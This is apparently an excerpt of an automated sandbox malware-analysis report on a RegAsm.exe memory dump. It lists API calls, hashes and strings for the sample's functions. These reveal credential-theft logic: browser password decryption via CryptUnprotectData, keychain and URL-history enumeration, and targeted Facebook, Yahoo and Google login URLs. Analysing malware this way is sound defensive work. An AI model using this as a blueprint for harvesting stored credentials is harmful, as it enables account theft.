                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$FirstNext
                                                                                • String ID:
                                                                                • API String ID: 1690352074-0
                                                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0041898C
                                                                                • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: InfoSystemmemset
                                                                                • String ID:
                                                                                • API String ID: 3558857096-0
                                                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 004455C2
                                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                                • memset.MSVCRT ref: 0044570D
                                                                                • memset.MSVCRT ref: 00445725
                                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                  • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                • memset.MSVCRT ref: 0044573D
                                                                                • memset.MSVCRT ref: 00445755
                                                                                • memset.MSVCRT ref: 004458CB
                                                                                • memset.MSVCRT ref: 004458E3
                                                                                • memset.MSVCRT ref: 0044596E
                                                                                • memset.MSVCRT ref: 00445A10
                                                                                • memset.MSVCRT ref: 00445A28
                                                                                • memset.MSVCRT ref: 00445AC6
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                • memset.MSVCRT ref: 00445B52
                                                                                • memset.MSVCRT ref: 00445B6A
                                                                                • memset.MSVCRT ref: 00445C9B
                                                                                • memset.MSVCRT ref: 00445CB3
                                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                                • memset.MSVCRT ref: 00445B82
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                • memset.MSVCRT ref: 00445986
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                • API String ID: 381723030-3798722523
                                                                                • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                • API String ID: 1442760552-28296030
                                                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040B71C
                                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                                • memset.MSVCRT ref: 0040B756
                                                                                • memset.MSVCRT ref: 0040B7F5
                                                                                • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                                                • memset.MSVCRT ref: 0040B851
                                                                                • memset.MSVCRT ref: 0040B8CA
                                                                                • memcmp.MSVCRT ref: 0040B9BF
                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                • memset.MSVCRT ref: 0040BB53
                                                                                • memcpy.MSVCRT ref: 0040BB66
                                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                                                • String ID: chp$v10
                                                                                • API String ID: 229402216-2783969131
                                                                                • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                • memset.MSVCRT ref: 00413D7F
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                • memset.MSVCRT ref: 00413E07
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$??3@CloseProcessProcess32memset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                • API String ID: 3791284831-1740548384
                                                                                • Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                • Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                  • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                • String ID: bhv
                                                                                • API String ID: 4234240956-2689659898
                                                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                Control-flow Graph

                                                                                control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                                                • __set_app_type.MSVCRT ref: 00446762
                                                                                • __p__fmode.MSVCRT ref: 00446777
                                                                                • __p__commode.MSVCRT ref: 00446785
                                                                                • __setusermatherr.MSVCRT ref: 004467B1
                                                                                • _initterm.MSVCRT ref: 004467C7
                                                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                                                • _initterm.MSVCRT ref: 004467FD
                                                                                • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                                                • exit.MSVCRT ref: 00446897
                                                                                • _cexit.MSVCRT ref: 0044689D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                • String ID:
                                                                                • API String ID: 2791496988-0
                                                                                • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040C298
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                • wcschr.MSVCRT ref: 0040C324
                                                                                • wcschr.MSVCRT ref: 0040C344
                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                • String ID: visited:
                                                                                • API String ID: 2470578098-1702587658
                                                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                Control-flow Graph

                                                                                control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 ??3@YAXPAX@Z 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                                                APIs
                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                • memset.MSVCRT ref: 0040E1BD
                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                • API String ID: 3883404497-2982631422
                                                                                • Opcode ID: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                • Opcode Fuzzy Hash: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                • memset.MSVCRT ref: 0040BC75
                                                                                • memset.MSVCRT ref: 0040BC8C
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                • memcmp.MSVCRT ref: 0040BCD6
                                                                                • memcpy.MSVCRT ref: 0040BD2B
                                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                • String ID:
                                                                                • API String ID: 115830560-3916222277
                                                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                • String ID: r!A
                                                                                • API String ID: 2791114272-628097481
                                                                                • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                • API String ID: 62308376-4196376884
                                                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                Control-flow Graph

                                                                                control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
